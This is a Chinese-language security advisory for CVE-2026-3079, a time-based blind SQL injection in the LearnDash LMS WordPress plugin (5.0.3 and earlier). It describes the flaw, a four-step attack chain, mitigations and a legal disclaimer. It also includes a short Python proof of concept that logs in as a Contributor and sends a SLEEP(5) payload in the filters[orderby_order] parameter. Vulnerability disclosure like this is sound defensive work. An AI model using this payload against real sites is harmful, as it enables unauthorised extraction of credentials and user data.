IPBUF安全漏洞报告
English
CVE-2026-3079 CVSS 6.5 中危

CVE-2026-3079 LearnDash LMS SQL注入漏洞

披露日期: 2026-03-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-3079
漏洞类型
SQL注入
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
LearnDash LMS (WordPress插件)

相关标签

SQL注入WordPressLearnDashCVE-2026-3079Web安全盲注

漏洞概述

LearnDash LMS WordPress插件在5.0.3及之前版本中存在基于时间的盲SQL注入漏洞。该漏洞源于`learndash_propanel_template`动作对`filters[orderby_order]`参数缺乏足够的转义处理。拥有Contributor及以上权限的认证攻击者可利用此漏洞,通过构造恶意SQL请求从数据库中提取敏感信息,对数据机密性构成威胁。

技术细节

该漏洞的核心在于LearnDash LMS插件在处理`learndash_propanel_template` AJAX动作时,未对用户输入的`filters[orderby_order]`参数进行充分的转义处理。攻击者利用这一缺陷,可以将恶意的SQL片段拼接到现有的数据库查询语句中。由于是盲注,攻击者无法直接获取查询结果,而是通过构造包含时间延迟函数(如SLEEP())的SQL语句,根据服务器响应时间的差异来判断SQL语句是否执行成功。进而,攻击者可以利用这一机制逐位推断出数据库中的敏感信息,如管理员密码哈希、用户信息等。此漏洞需要至少Contributor级别的权限才能触发。

攻击链分析

STEP 1
侦察
识别目标站点是否安装了LearnDash LMS插件,并确认版本是否在5.0.3及以下。
STEP 2
获取访问权限
注册或获取一个具有Contributor(投稿者)及以上权限的WordPress账户凭据。
STEP 3
漏洞利用
使用账户登录,向`/wp-admin/admin-ajax.php`发送POST请求,在`action`参数设为`learndash_propanel_template`,并在`filters[orderby_order]`参数中注入基于时间的盲注Payload(如SLEEP(5))。
STEP 4
数据窃取
根据服务器的响应时间延迟判断SQL语句执行情况,通过逐字节猜解的方式提取数据库中的敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" # Contributor or higher credentials username = "attacker" password = "password" # 1. Authenticate and get cookies (simplified) session = requests.Session() login_data = {'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': ''} session.post("http://example.com/wp-login.php", data=login_data) # 2. Send malicious payload to vulnerable parameter # Payload: Check if the query takes time (Blind SQLi) payload = "1 AND (SELECT SLEEP(5))" data = { 'action': 'learndash_propanel_template', 'filters[orderby_order]': payload } response = session.post(target_url, data=data) # 3. Analyze response time if response.elapsed.total_seconds() >= 5: print("Vulnerable! SQL Injection executed.") else: print("Not vulnerable.")

影响范围

LearnDash LMS <= 5.0.3

防御指南

临时缓解措施
建议立即将 LearnDash LMS 插件更新至修复后的版本。若暂时无法升级,应禁用 ProPanel 模块或严格限制具有 Contributor 及以上权限的用户账户,防止攻击者利用该漏洞窃取数据。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表